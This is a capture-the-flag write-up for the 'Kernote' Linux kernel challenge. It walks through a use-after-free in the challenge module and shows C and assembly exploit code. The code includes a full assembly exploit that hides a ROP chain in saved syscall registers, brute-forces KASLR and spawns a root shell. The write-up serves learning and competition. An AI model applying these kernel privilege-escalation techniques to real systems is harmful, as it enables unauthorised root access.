Kernote
Authors: Nspace
Tags: pwn, kernel
Points: 750
Let’s try kernote in kernel
nc 42.192.68.11 12345
Analysis
This is a kernel pwn challenge. The challenge uses the usual setup: a QEMU VM running Linux with a vulnerable module. We get an unprivileged shell in the VM and we have to exploit the kernel to become root and read the flag.
$ ls
bzImage readme.md rootfs.img run.sh
$ cat readme.md
Here are some kernel config options in case you need it
CONFIG_SLAB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
$ cat run.sh
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-hda ./rootfs.img \
-append "console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on" \
-monitor /dev/null \
-smp cores=2,threads=2 \
-nographic \
-cpu kvm64,+smep,+smap \
-no-reboot \
-snapshot
All the usual mitigations are enabled (SMEP, SMAP, KASLR, KPTI, …). The kernel also uses the SLAB allocator instead of the default SLUB and disables usermode helpers by hardcoding their path to “”. Furthermore the VM will shut down immediately if we cause any kernel warnings or panics.
rootfs.img is an ext4 disk. We can mount it to extract the files:
$ mount -o loop rootfs.img mount
$ ls mount
bin dev etc flag init kernote.ko linuxrc lost+found proc sbin sys tmp usr
$ cat mount/init
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
#mount -t devtmpfs devtmpfs /dev
mkdir /dev/pts
mount -t devpts devpts /dev/pts
echo /sbin/mdev>/proc/sys/kernel/hotplug
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
echo "flag{testflag}">/flag
chmod 660 /flag
insmod /kernote.ko
#/sbin/mdev -s
chmod 666 /dev/kernote
chmod 777 /tmp
setsid cttyhack setuidgid 1000 sh
poweroff -f
kptr_restrict=1 prevents us from reading kernel addresses from /proc/kallsyms and dmesg_restrict=1 prevents us from reading the kernel logs.
The interesting part is kernote.ko, the kernel module which contains the vulnerable code. My teammate busdma reverse engineered the module and quickly spotted some bugs. Here is the (cleaned up) decompilation.
uint64_t *buf[16];
uint64_t *note;
int major_num;
struct class *module_class;
struct device *module_device;
spinlock_t spin;

int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg);

const struct file_operations kernote_fo = {
    .unlocked_ioctl = kernote_ioctl,
};

int module_init(void)
{
    major_num = register_chrdev(0LL, "kernote", &kernote_fo);
    if (major_num < 0) {
        printk(KERN_INFO "[kernote] : Failed to register device\n");
        return major_num;
    }
    module_class = class_create(THIS_MODULE, "kernote", &module_device);
    if (IS_ERR(module_class)) {
        unregister_chrdev(major_num, "kernote");
        printk(KERN_INFO "[kernote] : Failed to create class\n");
        return PTR_ERR(module_class);
    }
    module_device = device_create(module_class, NULL, MKDEV(major_num, 0), NULL, "kernote");
    if (IS_ERR(module_device)) {
        class_destroy(module_class);
        unregister_chrdev(major_num, "kernote");
        printk(KERN_INFO "[kernote] : Failed to create device\n");
        return PTR_ERR(module_device);
    }
    printk(KERN_INFO "[kernote] : Insert module complete\n");
    return 0;
}
int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg)
{
    int ret;
    raw_spin_lock(&spin);
    switch (cmd) {
    // alloc note
    case 0x6667:
        if (arg > 15) {
            ret = -1;
            break;
        }
        uint64_t *newnote = kmalloc(32, GFP_KERNEL);
        buf[arg] = newnote;
        if (newnote == NULL) {
            ret = -1;
            break;
        }
        ret = 0;
        break;
    // free note
    case 0x6668:
        if (arg > 15 || buf[arg] == NULL) {
            ret = -1;
            break;
        }
        kfree(buf[arg]);
        buf[arg] = 0;
        ret = 0;
        break;
    // set note pointer
    case 0x6666:
        if (arg > 15) {
            ret = -1;
            break;
        }
        note = buf[arg];
        break;
    // write note
    case 0x6669:
        if (note) {
            *note = arg;
            ret = 0;
        } else {
            ret = -1;
        }
        break;
    // inc refcount?
    case 0x666a:
        struct user_struct *user = current_task->cred->user;
        refcount_inc(&user->__count);
        if (user->uid != 0) {
            printk(KERN_INFO "[kernote] : ********\n");
            ret = -1;
        } else if (note != NULL) {
            printk(KERN_INFO "[kernote] : 0x%lx\n", *note);
            ret = 0;
        } else {
            printk(KERN_INFO "[kernote] : No note\n");
            ret = -1;
        }
        break;
    }
    spin_unlock(&spin);
    return ret;
}
The first bug is that note can point to freed memory if we set it to the address of a note and then free that note. The second bug is that command 0x666a increments the user_struct's refcount but never decrements it. The second bug is useless because overflowing a refcount triggers a warning which shuts down the VM immediately, but the first bug looks promising. Later during the CTF the author of the task confirmed that the second bug was unintentional.
Command 0x666a looks like it might leak the contents of a note, but in practice it only does so when invoked by root and it logs the contents to dmesg, which we can't access. Either way it's not useful.
In conclusion, the bug lets us overwrite the first 8 bytes of a freed chunk in kmalloc-32. The challenge is to somehow use that to get root.
Exploitation
After reverse engineering the module busdma also wrote a PoC exploit that crashes the kernel with a controlled RIP. The PoC frees a note and reclaims the freed chunk with a struct seq_operations, which is heap allocated in kmalloc-32 and contains a function pointer in the first 8 bytes. It then uses the bug to overwrite the function pointer and reads from the seq file to call the overwritten pointer.
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define SET_NOTE 0x6666
#define ALLOC_ENTRY 0x6667
#define FREE_ENTRY 0x6668
#define WRITE_NOTE 0x6669

static int kfd;

static int set_note(uint64_t idx)
{
    return ioctl(kfd, SET_NOTE, idx);
}

static int alloc_entry(uint64_t idx)
{
    return ioctl(kfd, ALLOC_ENTRY, idx);
}

static int free_entry(uint64_t idx)
{
    return ioctl(kfd, FREE_ENTRY, idx);
}

static int write_note(uint64_t val)
{
    return ioctl(kfd, WRITE_NOTE, val);
}

int main(void)
{
    kfd = open("/dev/kernote", O_RDWR);
    assert(kfd > 0);

    for (int i = 0; i < 0x100; i++) {
        alloc_entry(0);
    }

    alloc_entry(1);
    set_note(1);
    free_entry(1);

    int fd = open("/proc/self/stat", O_RDONLY);
    write_note(0x4141414141414141);

    char buf[32] = {};
    read(fd, buf, sizeof(buf));
    return 0;
}
[ 3.856543] general protection fault, probably for non-canonical address 0x4141414141414141: 0000 [#1] SMP PTI
[ 3.858362] CPU: 0 PID: 141 Comm: pwn Tainted: G OE 5.11.9 #2
[ 3.859598] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[ 3.861074] RIP: 0010:__x86_indirect_thunk_rax+0x3/0x5
[ 3.861995] Code: 06 d7 ff 31 c0 e9 43 06 d7 ff <...>
[ 3.865260] RSP: 0018:ffffc90000253dc0 EFLAGS: 00010246
[ 3.866187] RAX: 4141414141414141 RBX: ffffc90000253e60 RCX: 0000000000000000
[ 3.867440] RDX: 0000000000000000 RSI: ffff888004d47be0 RDI: ffff888004d47bb8
[ 3.868698] RBP: ffffc90000253e18 R08: 0000000000001000 R09: ffff888003c63000
[ 3.869960] R10: ffffc90000253e68 R11: 0000000000000000 R12: 0000000000000000
[ 3.871217] R13: ffff888004d47bb8 R14: ffff888004d47be0 R15: ffffc90000253ef0
[ 3.872474] FS: 0000000001e68380(0000) GS:ffff888007600000(0000) knlGS:0000000000000000
[ 3.873898] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.874914] CR2: 000000000048afd0 CR3: 0000000004cca000 CR4: 00000000003006f0
This is a great starting point but it’s not enough to own the kernel. We can’t directly jump to some code in userspace because of SMEP + KPTI. We also can’t (seemingly) start a ROP or JOP chain right away because we don’t control the contents of any of the registers or the memory they point to (except rax which contains our overwritten function pointer).
My goal at this point was to try and use our bug to get arbitrary read and write in the kernel.
My first idea was to overwrite a freelist pointer. By default the first 8 bytes of a free kmalloc chunk contain the freelist pointer and we can easily get arbitrary r/w by overwriting that. Unfortunately this challenge doesn’t use the default allocator. Instead the author enabled the older SLAB allocator which stores metadata out-of-line and prevents this attack.
My second idea was to corrupt the next pointer of a msg_msgseg. I had played corCTF about 1 month earlier and spent a lot of time failing to pwn the Fire of Salvation kernel challenge. That challenge let us overwrite the first 40 bytes of a freed chunk in kmalloc-4k, which is somewhat similar to what we have here. You can find the author's writeup for that challenge here.
We can reclaim the freed note with a 32-byte msg_msgseg, which contains a pointer to the next msgseg in the first 8 bytes, then hopefully use that to get arbitrary read and write, just like in that challenge. Unfortunately I couldn't turn this into an arbitrary kernel r/w, even though I could crash the kernel with an arbitrary pointer dereference. The reason is that the bug doesn't let us overwrite the m_ts field of msg_msg, so the kernel will stop reading and writing after the first msg_msgseg.
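For the curious, the spray half of that idea can be set up roughly like the sketch below. This is my own illustration, not code from the exploit: the size arithmetic assumes a 48-byte msg_msg header and an 8-byte msg_msgseg header on x86-64/5.11, so a 4048+24 byte message spills its last 24 data bytes into a 32-byte msg_msgseg in kmalloc-32.

/*
 * Sketch only: spray msg_msgseg objects into kmalloc-32 to reclaim the freed
 * note. DATALEN_MSG assumes PAGE_SIZE - sizeof(struct msg_msg) == 4048.
 */
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define DATALEN_MSG 4048 /* assumed: PAGE_SIZE - sizeof(struct msg_msg) */
#define SEG_SPILL   24   /* bytes that land in the kmalloc-32 msg_msgseg */

static int spray_msgseg(void)
{
    struct { long mtype; char mtext[DATALEN_MSG + SEG_SPILL]; } msg = { .mtype = 1 };
    memset(msg.mtext, 'A', sizeof(msg.mtext));

    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
    if (qid < 0)
        return -1;

    /* Each msgsnd allocates a kmalloc-4k msg_msg plus one kmalloc-32 msg_msgseg. */
    return msgsnd(qid, &msg, sizeof(msg.mtext), 0);
}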
After spending hours on this idea and ultimately ruling it out I went back to busdma's crash PoC and started looking for controllable memory in GDB. I eventually noticed that there were a lot of what looked like userspace pointers near the bottom of the kernel's stack.
After looking at the system call handler for a bit it became clear that these are the saved userspace registers. One of the first things the system call handler does is to push a struct pt_regs on the stack. pt_regs contains the values of all the registers at the moment the system call was invoked. As far as I can tell all registers are saved on every syscall, despite what the comment on pt_regs says. Obviously the contents of pt_regs are fully controlled by userspace, minus some constraints such as that rax must contain the correct system call number.
struct pt_regs {
    unsigned long r15;
    unsigned long r14;
    unsigned long r13;
    unsigned long r12;
    unsigned long rbp;
    unsigned long rbx;
    unsigned long r11;
    unsigned long r10;
    unsigned long r9;
    unsigned long r8;
    unsigned long rax;
    unsigned long rcx;
    unsigned long rdx;
    unsigned long rsi;
    unsigned long rdi;
    unsigned long orig_rax;
    unsigned long rip;
    unsigned long cs;
    unsigned long eflags;
    unsigned long rsp;
    unsigned long ss;
};
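To make "fully controlled by userspace" concrete, here is a small sketch of my own (not part of the exploit; read_with_markers and the marker values are made up, and it assumes gcc/clang on x86-64): pin chosen values into the registers that the read syscall ignores, then trap into the kernel. While the kernel services the read, the pt_regs at the bottom of its stack holds exactly those values. Pinning rbx and rbp from C is awkward, which is part of why the final exploit uses an assembly helper instead.

/*
 * Sketch only: issue read() directly via the syscall instruction with marker
 * values in the registers the syscall ignores. Those values end up verbatim
 * in pt_regs on the kernel stack for the duration of the syscall.
 */
#include <unistd.h>

static long read_with_markers(int fd, void *buf, unsigned long len)
{
    register unsigned long r8  asm("r8")  = 0x1111111111111111UL;
    register unsigned long r9  asm("r9")  = 0x2222222222222222UL;
    register unsigned long r10 asm("r10") = 0x3333333333333333UL;
    register unsigned long r12 asm("r12") = 0x4444444444444444UL;
    register unsigned long r13 asm("r13") = 0x5555555555555555UL;
    register unsigned long r14 asm("r14") = 0x6666666666666666UL;
    register unsigned long r15 asm("r15") = 0x7777777777777777UL;
    long ret;

    asm volatile("syscall"
                 : "=a"(ret)
                 : "0"(0L /* SYS_read */), "D"(fd), "S"(buf), "d"(len),
                   "r"(r8), "r"(r9), "r"(r10), "r"(r12), "r"(r13), "r"(r14), "r"(r15)
                 : "rcx", "r11", "memory"); /* syscall clobbers rcx and r11 */
    return ret;
}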
At this point I had an idea: what if we could store a ROP chain in the contents of pt_regs? r8-r15, rbx, and rbp are ignored by the read syscall and can contain any value (except r11, which contains the saved rflags). This gives us about 80 bytes of contiguous controlled memory. Is this enough to fit a ROP chain that gives us root and returns to userspace without crashing? Can we even move the stack pointer to the beginning of the controlled area in a single gadget?
As luck would have it, the answer to the second question is yes! I found this gadget that moves the stack pointer by just the right amount when invoked from the overwritten seq_operations pointer:
0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
But still, 80 bytes is really not a lot. Can we fit our ROP chain in so little space? A typical payload used to get root in kernel exploits calls commit_creds(prepare_kernel_cred(NULL)). Doing this uses 32 bytes in our ROP chain. However, in addition to this we have to return to userspace cleanly, or we will crash the VM before we can use our newly-acquired root credentials. Returning to userspace takes an additional 40 bytes because we need to set rcx to a valid userspace address and r11 to valid flags before we can ROP to syscall_return_via_sysret. This comes in at 72 bytes, just below our 80-byte budget. We can further optimize this down to 64 bytes if we do commit_creds(&init_cred) instead and skip prepare_kernel_cred. init_cred is the cred structure used for the init process and it's located in the kernel's data section. Our final ROP chain then looks like this:
r15: 0xffffffff81075c4c: pop rdi; ret
r14: 0xffffffff8266b780: &init_cred
r13: 0xffffffff810c9dd5: commit_creds
r12: 0xffffffff810761da: pop rcx; ret
rbp: < address of our code in userspace >
rbx: 0xffffffff8107605a: pop r11; ret
r11: < valid rflags value >
r10: 0xffffffff81c00109: return from syscall
We need precise control over the values stored in the registers when we invoke the syscall handler, and we need to recover our userspace stack after returning. This is probably possible in C but I figured I should write a helper function in assembly instead, to have more precise control over the registers. The syscall instruction already stores the current value of rflags in r11, so we don't have to set that register.
pwn:
    mov [user_rsp], rsp
    mov r15, 0xffffffff81075c4c
    mov r14, 0xffffffff8266b780
    mov r13, 0xffffffff810c9dd5
    mov r12, 0xffffffff810761da
    lea rbp, [.after_syscall]
    mov rbx, 0xffffffff8107605a
    mov r10, 0xffffffff81c00109
    ; SYS_read
    xor eax, eax
    syscall
.after_syscall:
    mov rsp, [user_rsp]
    ret

user_rsp: dq 0
Combined with the seq_operations exploit this makes us root, and we can simply read and print the flag or execve a shell after returning to userspace.
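For completeness, that post-ROP userspace step can be as small as the sketch below (not the code we actually used; win() is a made-up helper name, and the final assembly exploit further down simply execves a shell):

/*
 * Sketch of the post-exploitation step: after the ROP chain runs
 * commit_creds(&init_cred) and returns to userspace, we are root, so we can
 * read the flag or spawn a root shell.
 */
#include <stdio.h>
#include <unistd.h>

static void win(void)
{
    char flag[64] = {0};
    FILE *f = fopen("/flag", "r");
    if (f && fgets(flag, sizeof(flag), f))
        printf("[+] flag: %s", flag);
    execl("/bin/sh", "sh", (char *)NULL); /* root shell */
}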
There is still an elephant in the room though. So far we have assumed that we know the address of all of these gadgets, and yet we still have absolutely no leaks of kernel addresses or a way to bypass KASLR.
Luckily for us, even with KASLR the base address of the kernel is not very random. In fact there are only 512 possible addresses at which the kernel will load itself. This is small enough that we can brute force it in a reasonable amount of time. We will keep trying our exploit assuming that the kernel's base address is 0xffffffff81000000 (same as if there was no KASLR) and eventually we will succeed. We are nearly guaranteed to succeed at least once if we run the exploit ~2000 times. In our experiments running the exploit against the remote system took about 5-10 seconds. We did some napkin math and concluded that we should be able to get the flag in about an hour or two by running multiple instances of the exploit in parallel. Since we still had several hours left before the end of the CTF we decided to go with that. We got the flag after about an hour.
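As a quick sanity check on that estimate: each run guesses the right base address with probability 1/512, so the probability of at least one success in n independent runs is

P(success) = 1 - (511/512)^n ≈ 1 - e^(-n/512)

which for n = 2000 comes out to roughly 1 - e^(-3.9) ≈ 0.98.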
I ended up writing an optimized version of the exploit entirely in assembly to make it smaller and speed up the brute forcing. The target VM has no internet access so we have to upload the exploit through the VM’s serial port which takes a long time. Even when using UPX and musl, the C exploit was about 18KB. The exploit written in assembly is only 342 bytes when gzipped, so it uploads much faster.
; Keep running this exploit until it works, which should take about 512 tries.
; Or alternatively find a KASLR bypass :)

; Emit 64-bit code.
bits 64
; Use RIP-relative addressing by default.
default rel
; Load at this address
org 0x40000000

ELFCLASS64    equ 2
ELFDATA2LSB   equ 1
EV_CURRENT    equ 1
ELFOSABI_NONE equ 0
ET_EXEC       equ 2
EM_X86_64     equ 62
PT_LOAD       equ 1
PF_X          equ 1
PF_W          equ 2
PF_R          equ 4
O_RDONLY      equ 0
O_RDWR        equ 2

; 64-bit ELF header.
elfh:
    ; e_ident
    db 0x7f, 'ELF', ELFCLASS64, ELFDATA2LSB, EV_CURRENT, ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0
    ; e_type
    dw ET_EXEC
    ; e_machine
    dw EM_X86_64
    ; e_version
    dd EV_CURRENT
    ; e_entry
    dq _start
    ; e_phoff
    dq phdr - $$
    ; e_shoff
    dq 0
    ; e_flags
    dd 0
    ; e_ehsize
    dw ehsize
    ; e_phentsize
    dw phsize
    ; e_phnum
    dw 1
    ; e_shentsize
    dw 0
    ; e_shnum
    dw 0
    ; e_shstrndx
    dw 0

; Size of the elf header.
ehsize equ $ - elfh

; 64-bit program header.
phdr:
    ; p_type;
    dd PT_LOAD
    ; p_flags;
    dd PF_R | PF_W | PF_X
    ; p_offset;
    dq 0
    ; p_vaddr;
    dq $$
    ; p_paddr;
    dq $$
    ; p_filesz;
    dq filesize
    ; p_memsz;
    dq filesize
    ; p_align;
    dq 0x1000

phsize equ $ - phdr

exit:
    mov eax, 60
    syscall
    ud2

open:
    mov eax, 2
    syscall
    ret

ioctl:
    mov eax, 16
    syscall
    ret

execve:
    mov eax, 59
    syscall
    ud2

set_note:
    mov edx, edi
    mov edi, [kfd]
    mov esi, 0x6666
    jmp ioctl

alloc_entry:
    mov edx, edi
    mov edi, [kfd]
    mov esi, 0x6667
    jmp ioctl

free_entry:
    mov edx, edi
    mov edi, [kfd]
    mov esi, 0x6668
    jmp ioctl

write_note:
    mov rdx, rdi
    mov edi, [kfd]
    mov esi, 0x6669
    jmp ioctl

pwn:
    mov [user_rsp], rsp
    ; 0xffffffff81075c4c: pop rdi; ret
    mov r15, 0xffffffff81075c4c
    ; 0xffffffff8266b780: init_cred
    mov r14, 0xffffffff8266b780
    ; 0xffffffff810c9dd5: commit_creds
    mov r13, 0xffffffff810c9dd5
    ; 0xffffffff810761da: pop rcx; ret
    mov r12, 0xffffffff810761da
    lea rbp, [.after_syscall]
    ; 0xffffffff8107605a: pop r11; ret
    mov rbx, 0xffffffff8107605a
    ; 0xffffffff81c00109: return from syscall
    mov r10, 0xffffffff81c00109
    xor eax, eax
    syscall
.after_syscall:
    mov rsp, [user_rsp]
    ret

_start:
    ; kfd = open("/dev/kernote", O_RDWR)
    lea rdi, [devpath]
    mov esi, O_RDWR
    call open
    mov [kfd], eax
    ; for (int i = 0; i < 0x100; i++) {
    ;     alloc_entry(0);
    ; }
    mov r8d, 0x100
.sprayloop:
    xor edi, edi
    call alloc_entry
    dec r8d
    jnz .sprayloop
    ; alloc_entry(1)
    mov edi, 1
    call alloc_entry
    ; set_note(1)
    mov edi, 1
    call set_note
    ; free_entry(1)
    mov edi, 1
    call free_entry
    ; statfd = open("/proc/self/stat", O_RDONLY)
    lea rdi, [statpath]
    mov esi, O_RDONLY
    call open
    mov [statfd], eax
    ; 0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
    ; write_note(0xffffffff81516ebe)
    mov rdi, 0xffffffff81516ebe
    call write_note
    ; pwn(statfd, buf, sizeof(buf))
    mov edi, [statfd]
    lea rsi, [buf]
    mov edx, bufsize
    call pwn
    ; execve("/bin/sh", {"/bin/sh", NULL}, NULL)
    lea rdi, [shell_path]
    lea rsi, [shell_argv]
    xor edx, edx
    jmp execve

user_rsp:   dq 0
kfd:        dd 0
statfd:     dd 0
shell_argv: dq shell_path, 0
buf:        times 32 db 0
bufsize     equ $ - buf
devpath:    db '/dev/kernote', 0
statpath:   db '/proc/self/stat', 0
shell_path: db '/bin/sh', 0

filesize equ $ - $$
flag{LMm2tayzwWEzGpnmoyyf8zoTmk6X5TQrL45o}
Intended solution
It is pretty clear that this solution is not what the author intended, but it was still fun and it got us a flag, which is what counts. The intended solution was to overwrite a freed ldt_struct. You can find the author's own writeup here.
Conclusion
Thanks to busdma for the help with reversing and the initial PoC exploit and to my teammates for letting me bounce ideas off of them. Thanks to 0ops and eee for the amazing CTF, we really had a lot of fun playing this one. Looking forward to next year’s edition :).
I don't know if using pt_regs as a ROP chain is a new technique or not. I've never heard of it before and I couldn't find anything on Google. It seems pretty powerful though: it only requires RIP control and bypasses all mitigations except KASLR, assuming that the kernel has the right gadgets. Let me know if it's been used before somewhere.